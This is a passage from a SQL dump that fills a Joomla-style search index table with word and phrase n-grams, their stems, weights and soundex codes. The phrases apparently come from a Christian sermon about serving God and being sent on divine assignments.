(315736, 't serve god', 't serve god', 0, 1, 1.3667, 'T26123', 1, '*'),
(315737, 'take me', 'take me', 0, 1, 1.2333, 'T250', 1, '*'),
(315738, 'take me serious', 'take me serious', 0, 1, 1.5, 'T25262', 1, '*'),
(315739, 'take you serious”.', 'take you serious”.', 0, 1, 1.6, 'T262', 1, '*'),
(315740, 'than to', 'than to', 0, 1, 1.2333, 'T530', 1, '*'),
(315741, 'than to serve', 'than to serve', 0, 1, 1.4333, 'T53261', 1, '*'),
(315742, 'that any', 'that any', 0, 1, 1.2667, 'T500', 1, '*'),
(315743, 'that any service', 'that any service', 0, 1, 1.5333, 'T52612', 1, '*'),
(315744, 'that doeth', 'that doeth', 0, 1, 1.3333, 'T000', 1, '*'),
(315745, 'that doeth the', 'that doeth the', 0, 1, 1.4667, 'T000', 1, '*'),
(315746, 'that god accepts', 'that god accepts', 0, 1, 1.5333, 'T232132', 1, '*'),
(315747, 'that in a', 'that in a', 0, 1, 1.3, 'T500', 1, '*'),
(315748, 'that keepeth', 'that keepeth', 0, 1, 1.4, 'T213', 1, '*'),
(315749, 'that keepeth back', 'that keepeth back', 0, 1, 1.5667, 'T21312', 1, '*'),
(315750, 'that serve', 'that serve', 0, 1, 1.3333, 'T261', 1, '*'),
(315751, 'that serve god', 'that serve god', 0, 1, 1.4667, 'T26123', 1, '*'),
(315752, 'the best it', 'the best it', 0, 1, 1.3667, 'T123', 1, '*'),
(315753, 'the bible is', 'the bible is', 0, 1, 1.4, 'T142', 1, '*'),
(315754, 'the first truths', 'the first truths', 0, 1, 1.5333, 'T1623632', 1, '*'),
(315755, 'the group', 'the group', 0, 1, 1.3, 'T261', 1, '*'),
(315756, 'the group of', 'the group of', 0, 1, 1.4, 'T261', 1, '*'),
(315757, 'the highest', 'the highest', 0, 1, 1.3667, 'T230', 1, '*'),
(315758, 'the highest level', 'the highest level', 0, 1, 1.5667, 'T23414', 1, '*'),
(315759, 'the lord deceitfully', 'the lord deceitfully', 0, 1, 1.6667, 'T4632314', 1, '*'),
(315760, 'the lord thy', 'the lord thy', 0, 1, 1.4, 'T463', 1, '*'),
(315761, 'the lord told', 'the lord told', 0, 1, 1.4333, 'T46343', 1, '*'),
(315762, 'the standard and', 'the standard and', 0, 1, 1.5333, 'T23536353', 1, '*'),
(315763, 'the standard of', 'the standard of', 0, 1, 1.5, 'T2353631', 1, '*'),
(315764, 'the two sons', 'the two sons', 0, 1, 1.4, 'T252', 1, '*'),
(315765, 'the wrath of', 'the wrath of', 0, 1, 1.4, 'T631', 1, '*'),
(315766, 'thee but to', 'thee but to', 0, 1, 1.3667, 'T130', 1, '*'),
(315767, 'their heart', 'their heart', 0, 1, 1.3667, 'T630', 1, '*'),
(315768, 'their heart and', 'their heart and', 0, 1, 1.5, 'T6353', 1, '*'),
(315769, 'them god', 'them god', 0, 1, 1.2667, 'T523', 2, '*'),
(315770, 'them god is', 'them god is', 0, 1, 1.3667, 'T5232', 1, '*'),
(315771, 'they brought', 'thei brought', 0, 1, 1.4, 'T1623', 1, '*'),
(315772, 'they brought strange', 'thei brought strange', 0, 1, 1.6667, 'T162323652', 1, '*'),
(315773, 'they came', 'thei came', 0, 1, 1.3, 'T250', 1, '*'),
(315774, 'they came to', 'thei came to', 0, 1, 1.4, 'T253', 1, '*'),
(315775, 'thy god require', 'thy god require', 0, 1, 1.5, 'T23626', 1, '*'),
(315776, 'thy god to', 'thy god to', 0, 1, 1.3333, 'T230', 1, '*'),
(315777, 'thy god with', 'thy god with', 0, 1, 1.4, 'T230', 1, '*'),
(315778, 'thy heart', 'thy heart', 0, 1, 1.3, 'T630', 1, '*'),
(315779, 'thy heart and', 'thy heart and', 0, 1, 1.4333, 'T6353', 1, '*'),
(315780, 'thy soul.”', 'thy soul.”', 0, 1, 1.3333, 'T240', 1, '*'),
(315781, 'thy soul.” god', 'thy soul.” god', 0, 1, 1.4667, 'T2423', 1, '*'),
(315782, 'time but', 'time but', 0, 1, 1.2667, 'T513', 1, '*'),
(315783, 'time but his', 'time but his', 0, 1, 1.4, 'T5132', 1, '*'),
(315784, 'to be served', 'to be served', 0, 1, 1.4, 'T12613', 1, '*'),
(315785, 'to divine standards', 'to divine standards', 0, 1, 1.6333, 'T152353632', 1, '*'),
(315786, 'to fear', 'to fear', 0, 1, 1.2333, 'T160', 1, '*'),
(315787, 'to fear the', 'to fear the', 0, 1, 1.3667, 'T163', 1, '*'),
(315788, 'to god at', 'to god at', 0, 1, 1.3, 'T230', 1, '*'),
(315789, 'to god either', 'to god either', 0, 1, 1.4333, 'T236', 1, '*'),
(315790, 'to love', 'to love', 0, 1, 1.2333, 'T410', 1, '*'),
(315791, 'to love him', 'to love him', 0, 1, 1.3667, 'T415', 1, '*'),
(315792, 'to serve him', 'to serve him', 0, 1, 1.4, 'T2615', 1, '*'),
(315793, 'to serve the', 'to serve the', 0, 1, 1.4, 'T2613', 2, '*'),
(315794, 'told me years', 'told me years', 0, 1, 1.4333, 'T43562', 1, '*'),
(315795, 'truths stated', 'truth stated', 0, 1, 1.4333, 'T6323', 1, '*'),
(315796, 'truths stated in', 'truth stated in', 0, 1, 1.5333, 'T63235', 1, '*'),
(315797, 'two sons of', 'two sons of', 0, 1, 1.3667, 'T2521', 1, '*'),
(315798, 'understood that in', 'understood that in', 0, 1, 1.6, 'U536235', 1, '*'),
(315799, 'up to divine', 'up to divine', 0, 1, 1.4, 'U1315', 1, '*'),
(315800, 'us but', 'us but', 0, 1, 1.2, 'U213', 2, '*'),
(315801, 'us but he', 'us but he', 0, 1, 1.3, 'U213', 2, '*'),
(315802, 'us to serve', 'us to serve', 0, 1, 1.3667, 'U23261', 1, '*'),
(315803, 'very costly', 'veri costly', 0, 1, 1.3667, 'V6234', 1, '*'),
(315804, 'very costly way', 'veri costly way', 0, 1, 1.5, 'V6234', 1, '*'),
(315805, 'vs 10', 'vs 10', 0, 1, 1.1667, 'V200', 1, '*'),
(315806, 'vs 10 says', 'vs 10 says', 0, 1, 1.3333, 'V200', 1, '*'),
(315807, 'vs 12', 'vs 12', 0, 1, 1.1667, 'V200', 1, '*'),
(315808, 'vs 12 says', 'vs 12 says', 0, 1, 1.3333, 'V200', 1, '*'),
(315809, 'walk in all', 'walk in all', 0, 1, 1.3667, 'W4254', 1, '*'),
(315810, 'wants men', 'want men', 0, 1, 1.3, 'W5325', 1, '*'),
(315811, 'wants men to', 'want men to', 0, 1, 1.4, 'W53253', 1, '*'),
(315812, 'wants the', 'want the', 0, 1, 1.3, 'W5323', 1, '*'),
(315813, 'wants the best', 'want the best', 0, 1, 1.4667, 'W5323123', 1, '*'),
(315814, 'was what separated', 'wa what separated', 0, 1, 1.6, 'W232163', 1, '*'),
(315815, 'way they', 'wai they', 0, 1, 1.2667, 'W300', 1, '*'),
(315816, 'way they brought', 'wai they brought', 0, 1, 1.5333, 'W31623', 1, '*'),
(315817, 'ways and', 'wai and', 0, 1, 1.2667, 'W253', 1, '*'),
(315818, 'ways and to', 'wai and to', 0, 1, 1.3667, 'W253', 1, '*'),
(315819, 'what doth', 'what doth', 0, 1, 1.3, 'W300', 1, '*'),
(315820, 'what doth the', 'what doth the', 0, 1, 1.4333, 'W300', 1, '*'),
(315821, 'what separated', 'what separated', 0, 1, 1.4667, 'W32163', 1, '*'),
(315822, 'what separated cain', 'what separated cain', 0, 1, 1.6333, 'W3216325', 1, '*'),
(315823, 'which they', 'which they', 0, 1, 1.3333, 'W230', 1, '*'),
(315824, 'which they came', 'which they came', 0, 1, 1.5, 'W2325', 1, '*'),
(315825, 'will never', 'will never', 0, 1, 1.3333, 'W4516', 1, '*'),
(315826, 'will never accept', 'will never accept', 0, 1, 1.5667, 'W4516213', 1, '*'),
(315827, 'will take you', 'will take you', 0, 1, 1.4333, 'W432', 1, '*'),
(315828, 'with all', 'with all', 0, 1, 1.2667, 'W340', 1, '*'),
(315829, 'with all their', 'with all their', 0, 1, 1.4667, 'W3436', 1, '*'),
(315830, 'with all thy', 'with all thy', 0, 1, 1.4, 'W343', 1, '*'),
(315831, 'with all your', 'with all your', 0, 1, 1.4333, 'W346', 1, '*'),
(315832, 'with honour', 'with honour', 0, 1, 1.3667, 'W356', 1, '*'),
(315833, 'with honour the', 'with honour the', 0, 1, 1.5, 'W3563', 1, '*'),
(315834, 'with which they', 'with which they', 0, 1, 1.5, 'W323', 1, '*'),
(315835, 'wrath of', 'wrath of', 0, 1, 1.2667, 'W631', 1, '*'),
(315836, 'wrath of god', 'wrath of god', 0, 1, 1.4, 'W63123', 1, '*'),
(315837, 'wrong and mediocre', 'wrong and mediocre', 0, 1, 1.6, 'W652535326', 1, '*'),
(315838, 'years ago my', 'year ago my', 0, 1, 1.4, 'Y625', 1, '*'),
(315839, 'you are bringing', 'you are bringing', 0, 1, 1.5333, 'Y6165252', 1, '*'),
(315840, 'you serious”.', 'you serious”.', 0, 1, 1.4333, 'Y262', 1, '*'),
(315841, 'you serious”. your', 'you serious”. your', 0, 1, 1.6, 'Y2626', 1, '*'),
(315842, 'you take me', 'you take me', 0, 1, 1.3667, 'Y325', 1, '*'),
(315843, 'your own convenience', 'your own convenience', 0, 1, 1.6667, 'Y6525152', 1, '*'),
(315844, 'your own time', 'your own time', 0, 1, 1.4333, 'Y6535', 1, '*'),
(315845, 'your possession and', 'your possession and', 0, 1, 1.6333, 'Y61253', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(315846, 'your service', 'your service', 0, 1, 1.4, 'Y62612', 1, '*'),
(315847, 'your service any', 'your service any', 0, 1, 1.5333, 'Y626125', 1, '*'),
(315848, 'your service must', 'your service must', 0, 1, 1.5667, 'Y62612523', 1, '*'),
(317330, '.” god', '.” god', 0, 1, 1.2, '”230', 1, '*'),
(317331, '.” god is', '.” god is', 0, 1, 1.3, '”232', 1, '*'),
(317332, '08 2017', '08 2017', 0, 1, 1.2333, '', 1, '*'),
(317333, '13 08', '13 08', 0, 1, 1.1667, '', 1, '*'),
(317334, '13 08 2017', '13 08 2017', 0, 1, 1.3333, '', 1, '*'),
(317335, '20-30', '20-30', 0, 0, 0.5, '', 1, '*'),
(317336, '20-30 years', '20-30 years', 0, 1, 1.3667, 'Y620', 1, '*'),
(317337, '20-30 years there', '20-30 years there', 0, 1, 1.5667, 'Y6236', 1, '*'),
(317338, '2017 i', '2017 i', 0, 1, 1.2, 'I000', 1, '*'),
(317339, '2017 i divine', '2017 i divine', 0, 1, 1.4333, 'I315', 1, '*'),
(317340, '26 christians', '26 christians', 0, 1, 1.4333, 'C62352', 1, '*'),
(317341, '26 christians leave', '26 christians leave', 0, 1, 1.6333, 'C6235241', 1, '*'),
(317342, '3 labels', '3 labels', 0, 1, 1.2667, 'L142', 1, '*'),
(317343, '3 labels god', '3 labels god', 0, 1, 1.4, 'L1423', 1, '*'),
(317344, '57 are', '57 are', 0, 1, 1.2, 'A600', 1, '*'),
(317345, '57 are you', '57 are you', 0, 1, 1.3333, 'A600', 1, '*'),
(317346, '6 verse', '6 verse', 0, 1, 1.2333, 'V620', 1, '*'),
(317347, '6 verse 8', '6 verse 8', 0, 1, 1.3, 'V620', 1, '*'),
(317348, '8 says', '8 says', 0, 1, 1.2, 'S000', 1, '*'),
(317349, '8 says also', '8 says also', 0, 1, 1.3667, 'S420', 1, '*'),
(317350, 'a breakdown', 'a breakdown', 0, 1, 1.3667, 'A16235', 1, '*'),
(317351, 'a breakdown of', 'a breakdown of', 0, 1, 1.4667, 'A162351', 1, '*'),
(317352, 'a bullet', 'a bullet', 0, 1, 1.2667, 'A143', 1, '*'),
(317353, 'a bullet to', 'a bullet to', 0, 1, 1.3667, 'A143', 1, '*'),
(317354, 'a land', 'a land', 0, 1, 1.2, 'A453', 1, '*'),
(317355, 'a land the', 'a land the', 0, 1, 1.3333, 'A453', 1, '*'),
(317356, 'a message', 'a message', 0, 1, 1.3, 'A520', 2, '*'),
(317357, 'a message a', 'a message a', 0, 1, 1.3667, 'A520', 1, '*'),
(317358, 'a new turn', 'a new turn', 0, 1, 1.3333, 'A5365', 1, '*'),
(317359, 'a place i', 'a place i', 0, 1, 1.3, 'A142', 1, '*'),
(317360, 'a power', 'a power', 0, 1, 1.2333, 'A160', 1, '*'),
(317361, 'a power of', 'a power of', 0, 1, 1.3333, 'A161', 1, '*'),
(317362, 'a professor', 'a professor', 0, 1, 1.3667, 'A16126', 1, '*'),
(317363, 'a professor of', 'a professor of', 0, 1, 1.4667, 'A161261', 1, '*'),
(317364, 'a sender', 'a sender', 0, 1, 1.2667, 'A2536', 1, '*'),
(317365, 'a sender and', 'a sender and', 0, 1, 1.4, 'A253653', 1, '*'),
(317366, 'a sent', 'a sent', 0, 1, 1.2, 'A253', 1, '*'),
(317367, 'a sent man', 'a sent man', 0, 1, 1.3333, 'A2535', 1, '*'),
(317368, 'a town', 'a town', 0, 1, 1.2, 'A350', 1, '*'),
(317369, 'a town in', 'a town in', 0, 1, 1.3, 'A350', 1, '*'),
(317370, 'able to overcome', 'abl to overcome', 0, 1, 1.5333, 'A1431625', 1, '*'),
(317371, 'again god', 'again god', 0, 1, 1.3, 'A2523', 1, '*'),
(317372, 'again god sent', 'again god sent', 0, 1, 1.4667, 'A2523253', 1, '*'),
(317373, 'also i', 'also i', 0, 1, 1.2, 'A420', 1, '*'),
(317374, 'also i heard', 'also i heard', 0, 1, 1.4, 'A4263', 1, '*'),
(317375, 'am sending', 'am sending', 0, 1, 1.3333, 'A525352', 1, '*'),
(317376, 'am sending you', 'am sending you', 0, 1, 1.4667, 'A525352', 1, '*'),
(317377, 'an encounter', 'an encounter', 0, 1, 1.4, 'A52536', 1, '*'),
(317378, 'an encounter with', 'an encounter with', 0, 1, 1.5667, 'A525363', 1, '*'),
(317379, 'an ordinary man', 'an ordinary man', 0, 1, 1.5, 'A563565', 1, '*'),
(317380, 'ancestors', 'ancestor', 0, 0, 0.6, 'A52362', 1, '*'),
(317381, 'ancestors have', 'ancestor have', 0, 1, 1.4667, 'A523621', 1, '*'),
(317382, 'ancestors have stirred', 'ancestor have stirred', 0, 1, 1.7333, 'A5236212363', 1, '*'),
(317383, 'and divine backing', 'and divine backing', 0, 1, 1.6, 'A53151252', 1, '*'),
(317384, 'and from', 'and from', 0, 1, 1.2667, 'A53165', 1, '*'),
(317385, 'and from that', 'and from that', 0, 1, 1.4333, 'A531653', 1, '*'),
(317386, 'and he showed', 'and he showed', 0, 1, 1.4333, 'A5323', 1, '*'),
(317387, 'and how things', 'and how things', 0, 1, 1.4667, 'A5352', 1, '*'),
(317388, 'and i obeyed', 'and i obeyed', 0, 1, 1.4, 'A5313', 1, '*'),
(317389, 'and order in', 'and order in', 0, 1, 1.4, 'A536365', 1, '*'),
(317390, 'and sent', 'and sent', 0, 1, 1.2667, 'A53253', 1, '*'),
(317391, 'and sent anytime', 'and sent anytime', 0, 1, 1.5333, 'A53253535', 1, '*'),
(317392, 'and went there', 'and went there', 0, 1, 1.4667, 'A53536', 1, '*'),
(317393, 'anger through', 'anger through', 0, 1, 1.4333, 'A526362', 1, '*'),
(317394, 'anger through evil', 'anger through evil', 0, 1, 1.6, 'A52636214', 1, '*'),
(317395, 'anytime', 'anytim', 0, 0, 0.4667, 'A535', 1, '*'),
(317396, 'anytime there', 'anytim there', 0, 1, 1.4333, 'A53536', 1, '*'),
(317397, 'anytime there is', 'anytim there is', 0, 1, 1.5333, 'A535362', 1, '*'),
(317398, 'are 3', 'ar 3', 0, 1, 1.1667, 'A600', 1, '*'),
(317399, 'are 3 labels', 'ar 3 labels', 0, 1, 1.4, 'A64142', 1, '*'),
(317400, 'are different', 'ar different', 0, 1, 1.4333, 'A631653', 1, '*'),
(317401, 'are different happenings', 'ar different happenings', 0, 1, 1.8, 'A631653152', 1, '*'),
(317402, 'are no', 'ar no', 0, 1, 1.2, 'A650', 1, '*'),
(317403, 'are no longer', 'ar no longer', 0, 1, 1.4333, 'A654526', 1, '*'),
(317404, 'are sendable', 'ar sendable', 0, 1, 1.4, 'A625314', 1, '*'),
(317405, 'are sendable are', 'ar sendable are', 0, 1, 1.5333, 'A6253146', 1, '*'),
(317406, 'are those that', 'ar those that', 0, 1, 1.4667, 'A6323', 1, '*'),
(317407, 'are you part', 'ar you part', 0, 1, 1.4, 'A6163', 1, '*'),
(317408, 'are you sendable', 'ar you sendable', 0, 1, 1.5333, 'A625314', 1, '*'),
(317409, 'around you for', 'around you for', 0, 1, 1.4667, 'A65316', 1, '*'),
(317410, 'ask you are', 'ask you are', 0, 1, 1.3667, 'A260', 1, '*'),
(317411, 'asking who', 'ask who', 0, 1, 1.3333, 'A252', 1, '*'),
(317412, 'asking who can', 'ask who can', 0, 1, 1.4667, 'A2525', 1, '*'),
(317413, 'asking who shall', 'ask who shall', 0, 1, 1.5333, 'A2524', 1, '*'),
(317414, 'assignment some', 'assign some', 0, 1, 1.5, 'A25325', 1, '*'),
(317415, 'assignment some of', 'assign some of', 0, 1, 1.6, 'A253251', 1, '*'),
(317416, 'at gobc', 'at gobc', 0, 1, 1.2333, 'A3212', 1, '*'),
(317417, 'at gobc 2017', 'at gobc 2017', 0, 1, 1.4, 'A3212', 1, '*'),
(317418, 'back to my', 'back to my', 0, 1, 1.3333, 'B235', 1, '*'),
(317419, 'back to your', 'back to your', 0, 1, 1.4, 'B236', 1, '*'),
(317420, 'backing of', 'back of', 0, 1, 1.3333, 'B2521', 1, '*'),
(317421, 'backing of who', 'back of who', 0, 1, 1.4667, 'B2521', 1, '*'),
(317422, 'bad the', 'bad the', 0, 1, 1.2333, 'B300', 1, '*'),
(317423, 'bad the devil', 'bad the devil', 0, 1, 1.4333, 'B314', 1, '*'),
(317424, 'be more muslims', 'be more muslims', 0, 1, 1.5, 'B5652452', 1, '*'),
(317425, 'because someone', 'becaus someone', 0, 1, 1.5, 'B250', 1, '*'),
(317426, 'because someone was', 'becaus someone was', 0, 1, 1.6333, 'B252', 1, '*'),
(317427, 'become a professor', 'becom a professor', 0, 1, 1.6, 'B2516126', 1, '*'),
(317428, 'been done wrongly', 'been done wrongly', 0, 1, 1.5667, 'B5356524', 1, '*'),
(317429, 'been equipped', 'been equipped', 0, 1, 1.4333, 'B5213', 1, '*'),
(317430, 'been equipped now', 'been equipped now', 0, 1, 1.5667, 'B52135', 1, '*'),
(317431, 'before then', 'befor then', 0, 1, 1.3667, 'B635', 1, '*'),
(317432, 'before then i', 'befor then i', 0, 1, 1.4333, 'B635', 1, '*'),
(317433, 'being is', 'be is', 0, 1, 1.2667, 'B520', 1, '*'),
(317434, 'being is sendable', 'be is sendable', 0, 1, 1.5667, 'B525314', 1, '*'),
(317435, 'beloved are', 'belov are', 0, 1, 1.3667, 'B4136', 1, '*'),
(317436, 'beloved are you', 'belov are you', 0, 1, 1.5, 'B4136', 1, '*'),
(317437, 'bless us', 'bless us', 0, 1, 1.2667, 'B420', 1, '*'),
(317438, 'bless us but', 'bless us but', 0, 1, 1.4, 'B4213', 1, '*'),
(317439, 'born again god', 'born again god', 0, 1, 1.4667, 'B652523', 1, '*'),
(317440, 'breakdown', 'breakdown', 0, 0, 0.6, 'B6235', 1, '*'),
(317441, 'breakdown of', 'breakdown of', 0, 1, 1.4, 'B62351', 1, '*'),
(317442, 'breakdown of law', 'breakdown of law', 0, 1, 1.5333, 'B623514', 1, '*'),
(317443, 'bullet', 'bullet', 0, 0, 0.4, 'B430', 1, '*'),
(317444, 'bullet to', 'bullet to', 0, 1, 1.3, 'B430', 1, '*'),
(317445, 'bullet to take', 'bullet to take', 0, 1, 1.4667, 'B432', 1, '*'),
(317446, 'business planning', 'busi planning', 0, 1, 1.5667, 'B2521452', 1, '*'),
(317447, 'business planning to', 'busi planning to', 0, 1, 1.6667, 'B25214523', 1, '*'),
(317448, 'but he came', 'but he came', 0, 1, 1.3667, 'B325', 1, '*'),
(317449, 'but i told', 'but i told', 0, 1, 1.3333, 'B343', 1, '*'),
(317450, 'call for sendable', 'call for sendable', 0, 1, 1.5667, 'C41625314', 1, '*'),
(317451, 'called and', 'call and', 0, 1, 1.3333, 'C4353', 1, '*'),
(317452, 'called and sent', 'call and sent', 0, 1, 1.5, 'C4353253', 1, '*'),
(317453, 'came to bless', 'came to bless', 0, 1, 1.4333, 'C53142', 1, '*'),
(317454, 'came to commission', 'came to commission', 0, 1, 1.6, 'C532525', 1, '*'),
(317455, 'came to me', 'came to me', 0, 1, 1.3333, 'C535', 1, '*'),
(317456, 'can overcome', 'can overcome', 0, 1, 1.4, 'C51625', 1, '*'),
(317457, 'can overcome the', 'can overcome the', 0, 1, 1.5333, 'C516253', 1, '*'),
(317458, 'can we', 'can we', 0, 1, 1.2, 'C500', 1, '*'),
(317459, 'can we send', 'can we send', 0, 1, 1.3667, 'C5253', 1, '*'),
(317460, 'cannot withstand', 'cannot withstand', 0, 1, 1.5333, 'C532353', 1, '*'),
(317461, 'cannot withstand he', 'cannot withstand he', 0, 1, 1.6333, 'C532353', 1, '*'),
(317462, 'carriers', 'carrier', 0, 0, 0.5333, 'C620', 1, '*'),
(317463, 'carriers of', 'carrier of', 0, 1, 1.3667, 'C621', 1, '*'),
(317464, 'carriers of his', 'carrier of his', 0, 1, 1.5, 'C6212', 1, '*'),
(317465, 'carry the consciousness', 'carri the consciousness', 0, 1, 1.7667, 'C6325252', 1, '*'),
(317466, 'challenge', 'challeng', 0, 0, 0.6, 'C452', 1, '*'),
(317467, 'challenge you', 'challeng you', 0, 1, 1.4333, 'C452', 1, '*'),
(317468, 'challenge you today', 'challeng you today', 0, 1, 1.6333, 'C4523', 1, '*'),
(317469, 'christian convert', 'christian convert', 0, 1, 1.5667, 'C623525163', 1, '*'),
(317470, 'christian convert 26', 'christian convert 26', 0, 1, 1.6667, 'C623525163', 1, '*'),
(317471, 'christians .”', 'christian .”', 0, 1, 1.4333, 'C62352', 1, '*'),
(317472, 'christians .” god', 'christian .” god', 0, 1, 1.5667, 'C623523', 1, '*'),
(317473, 'christians leave', 'christian leave', 0, 1, 1.5333, 'C6235241', 1, '*'),
(317474, 'christians leave the', 'christian leave the', 0, 1, 1.6667, 'C62352413', 1, '*'),
(317475, 'church that', 'church that', 0, 1, 1.3667, 'C623', 1, '*'),
(317476, 'church that is', 'church that is', 0, 1, 1.4667, 'C6232', 1, '*'),
(317477, 'come to recruit', 'come to recruit', 0, 1, 1.5, 'C536263', 1, '*'),
(317478, 'come to such', 'come to such', 0, 1, 1.4, 'C532', 1, '*'),
(317479, 'commission us', 'commiss us', 0, 1, 1.4333, 'C5252', 1, '*'),
(317480, 'commission us god', 'commiss us god', 0, 1, 1.5667, 'C52523', 1, '*'),
(317481, 'consciousness of', 'conscious of', 0, 1, 1.5333, 'C52521', 1, '*'),
(317482, 'consciousness of this', 'conscious of this', 0, 1, 1.7, 'C5252132', 1, '*'),
(317483, 'convention is', 'convent is', 0, 1, 1.4333, 'C515352', 1, '*'),
(317484, 'convention is not', 'convent is not', 0, 1, 1.5667, 'C51535253', 1, '*'),
(317485, 'convert', 'convert', 0, 0, 0.4667, 'C5163', 1, '*'),
(317486, 'convert 26', 'convert 26', 0, 1, 1.3333, 'C5163', 1, '*'),
(317487, 'convert 26 christians', 'convert 26 christians', 0, 1, 1.7, 'C5163262352', 1, '*'),
(317488, 'could young', 'could young', 0, 1, 1.3667, 'C4352', 1, '*'),
(317489, 'could young people', 'could young people', 0, 1, 1.6, 'C435214', 1, '*'),
(317490, 'dearly beloved are', 'dearli beloved are', 0, 1, 1.6, 'D6414136', 1, '*'),
(317491, 'delegates', 'deleg', 0, 0, 0.6, 'D4232', 1, '*'),
(317492, 'delegates ii', 'deleg ii', 0, 1, 1.4, 'D4232', 1, '*'),
(317493, 'delegates ii god\'s', 'deleg ii god', 0, 1, 1.6, 'D423232', 1, '*'),
(317494, 'devil has taken', 'devil has taken', 0, 1, 1.5, 'D142325', 1, '*'),
(317495, 'didn\'t send', 'didn send', 0, 1, 1.3667, 'D53253', 1, '*'),
(317496, 'didn\'t send himself', 'didn send himself', 0, 1, 1.6333, 'D532535241', 1, '*'),
(317497, 'different happenings', 'differ happenings', 0, 1, 1.6667, 'D1653152', 1, '*'),
(317498, 'different happenings that', 'differ happenings that', 0, 1, 1.8333, 'D16531523', 1, '*'),
(317499, 'divine backing', 'divin backing', 0, 1, 1.4667, 'D151252', 1, '*'),
(317500, 'divine backing of', 'divin backing of', 0, 1, 1.5667, 'D1512521', 1, '*'),
(317501, 'divine delegates', 'divin delegates', 0, 1, 1.5333, 'D1534232', 1, '*'),
(317502, 'divine delegates ii', 'divin delegates ii', 0, 1, 1.6333, 'D1534232', 1, '*'),
(317503, 'do during', 'do during', 0, 1, 1.3, 'D652', 1, '*'),
(317504, 'do during the', 'do during the', 0, 1, 1.4333, 'D6523', 1, '*'),
(317505, 'do not understand', 'do not understand', 0, 1, 1.5667, 'D535362353', 1, '*'),
(317506, 'does not reckon', 'doe not reckon', 0, 1, 1.5, 'D253625', 1, '*'),
(317507, 'done wrongly', 'done wrongly', 0, 1, 1.4, 'D56524', 1, '*'),
(317508, 'done wrongly before', 'done wrongly before', 0, 1, 1.6333, 'D5652416', 1, '*'),
(317509, 'during the convention', 'dure the convention', 0, 1, 1.7, 'D6523251535', 1, '*'),
(317510, 'electronics', 'electron', 0, 0, 0.7333, 'E423652', 1, '*'),
(317511, 'electronics when', 'electron when', 0, 1, 1.5333, 'E4236525', 1, '*'),
(317512, 'electronics when the', 'electron when the', 0, 1, 1.6667, 'E42365253', 1, '*'),
(317513, 'encounter with the', 'encount with the', 0, 1, 1.6, 'E525363', 1, '*'),
(317514, 'equipped', 'equip', 0, 0, 0.5333, 'E213', 1, '*'),
(317515, 'equipped now', 'equip now', 0, 1, 1.4, 'E2135', 1, '*'),
(317516, 'equipped now go', 'equip now go', 0, 1, 1.5, 'E21352', 1, '*'),
(317517, 'equips you for', 'equip you for', 0, 1, 1.4667, 'E21216', 1, '*'),
(317518, 'europe', 'europ', 0, 0, 0.4, 'E610', 1, '*'),
(317519, 'europe and', 'europ and', 0, 1, 1.3333, 'E6153', 1, '*'),
(317520, 'europe and god', 'europ and god', 0, 1, 1.4667, 'E615323', 1, '*'),
(317521, 'europe in', 'europ in', 0, 1, 1.3, 'E615', 1, '*'),
(317522, 'europe in the', 'europ in the', 0, 1, 1.4333, 'E6153', 1, '*'),
(317523, 'every christian convert', 'everi christian convert', 0, 1, 1.7667, 'E162623525163', 1, '*'),
(317524, 'evil occultic', 'evil occultic', 0, 1, 1.4333, 'E142432', 1, '*'),
(317525, 'evil occultic practices', 'evil occultic practices', 0, 1, 1.7667, 'E14243216232', 1, '*'),
(317526, 'except you', 'except you', 0, 1, 1.3333, 'E213', 1, '*'),
(317527, 'except you make', 'except you make', 0, 1, 1.5, 'E21352', 1, '*'),
(317528, 'faced', 'face', 0, 0, 0.3333, 'F230', 1, '*'),
(317529, 'faced serious', 'face serious', 0, 1, 1.4333, 'F23262', 1, '*'),
(317530, 'faced serious oppositions', 'face serious oppositions', 0, 1, 1.8333, 'F2326212352', 1, '*'),
(317531, 'family and', 'famili and', 0, 1, 1.3333, 'F5453', 1, '*'),
(317532, 'family and he', 'famili and he', 0, 1, 1.4333, 'F5453', 1, '*'),
(317533, 'family and how', 'famili and how', 0, 1, 1.4667, 'F5453', 1, '*'),
(317534, 'family some', 'famili some', 0, 1, 1.3667, 'F5425', 1, '*'),
(317535, 'family some of', 'famili some of', 0, 1, 1.4667, 'F54251', 1, '*'),
(317536, 'family when', 'famili when', 0, 1, 1.3667, 'F545', 1, '*'),
(317537, 'family when i', 'famili when i', 0, 1, 1.4333, 'F545', 1, '*'),
(317538, 'father\'s heart 13', 'father heart 13', 0, 1, 1.5667, 'F36263', 1, '*'),
(317539, 'father\'s heart dearly', 'father heart dearly', 0, 1, 1.7, 'F3626364', 1, '*'),
(317540, 'fire a', 'fire a', 0, 1, 1.2, 'F600', 1, '*'),
(317541, 'fire a bullet', 'fire a bullet', 0, 1, 1.4333, 'F6143', 1, '*'),
(317542, 'for every christian', 'for every christian', 0, 1, 1.6333, 'F61626235', 1, '*'),
(317543, 'for example in', 'for example in', 0, 1, 1.4667, 'F625145', 1, '*'),
(317544, 'for jesus many', 'for jesus many', 0, 1, 1.4667, 'F625', 1, '*'),
(317545, 'for sendable', 'for sendable', 0, 1, 1.4, 'F625314', 1, '*'),
(317546, 'for sendable men', 'for sendable men', 0, 1, 1.5333, 'F6253145', 1, '*'),
(317547, 'for somebody and', 'for somebody and', 0, 1, 1.5333, 'F6251353', 1, '*'),
(317548, 'for us muhammad', 'for us muhammad', 0, 1, 1.5, 'F6253', 1, '*'),
(317549, 'for your assignment', 'for your assignment', 0, 1, 1.6333, 'F6253', 2, '*'),
(317550, 'forces iii', 'forc iii', 0, 1, 1.3333, 'F620', 1, '*'),
(317551, 'forces iii a', 'forc iii a', 0, 1, 1.4, 'F620', 1, '*'),
(317552, 'from the father\'s', 'from the father', 0, 1, 1.5667, 'F6531362', 1, '*'),
(317553, 'from today god', 'from today god', 0, 1, 1.4667, 'F65323', 1, '*'),
(317554, 'gaddafi', 'gaddafi', 0, 0, 0.4667, 'G310', 1, '*'),
(317555, 'gaddafi said', 'gaddafi said', 0, 1, 1.4, 'G3123', 1, '*'),
(317556, 'gaddafi said “by', 'gaddafi said “by', 0, 1, 1.5333, 'G31231', 1, '*'),
(317557, 'give you something', 'give you something', 0, 1, 1.6, 'G125352', 1, '*'),
(317558, 'glory will', 'glori will', 0, 1, 1.3333, 'G464', 1, '*'),
(317559, 'glory will you', 'glori will you', 0, 1, 1.4667, 'G464', 1, '*'),
(317560, 'go till', 'go till', 0, 1, 1.2333, 'G340', 1, '*'),
